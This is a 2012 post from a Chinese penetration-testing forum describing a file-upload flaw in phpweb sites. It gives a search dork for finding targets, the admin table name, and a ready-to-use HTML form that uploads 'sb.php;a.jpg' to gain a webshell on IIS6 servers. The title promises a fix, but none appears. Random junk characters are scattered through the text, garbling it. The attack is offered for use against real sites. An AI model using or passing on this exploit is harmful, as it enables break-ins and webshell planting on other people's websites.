中国网络渗透测试联盟

标题: phpweb成品网站全版本通杀注入漏洞及修复 [打印本页]
作者: admin    时间: 2012-11-9 20:52
标题: phpweb成品网站全版本通杀注入漏洞及修复
关键字:inurl:webmall/detail.php?id2 S# T( r) W& t

* Y/ c. c' n; \, ^5 \数据表:pwn_base_admin1 v! b: C3 R/ R% V1 l8 W0 w

* k5 r8 Y# N7 I关于拿shell
5 \8 @7 R* A$ p( ?
7 E+ s" n/ i7 |+ g  ?首先登录后台admin.php
# b0 l9 E" ~' t2 v% ] " N: h, m( A) H" D
看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。% y$ I) [3 Y% A0 }
换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg
5 k% J0 r* T/ p+ k9 B$ p2 h' E7 u然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的
. A3 o  l. J4 @- O3 W<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">
+ R5 n( B3 {' v8 W' e" A2 w: W! b<input type="text" name="fileName" value="sb.php;a.jpg" />
/ J4 c5 g" m9 P<input type="hidden" name="attachPath" value="news/pics/" /> 3 {& i1 z2 n$ U' |/ J. @  a9 z2 T4 m
<input type="file" name="fileData" size="14" /></td> ; S3 Q: w$ n% B/ P' E
<input type="submit" name="button" value="确定" /> ) _3 u8 ^; ?! s0 Y2 y
</form>
+ ^& D8 K% G$ |) Y* k
" f* i$ {/ N7 q3 v( w3 m首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。/ K, U; Z% E2 y" Y5 h
; Y! g, r. V( @& e& r1 F




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2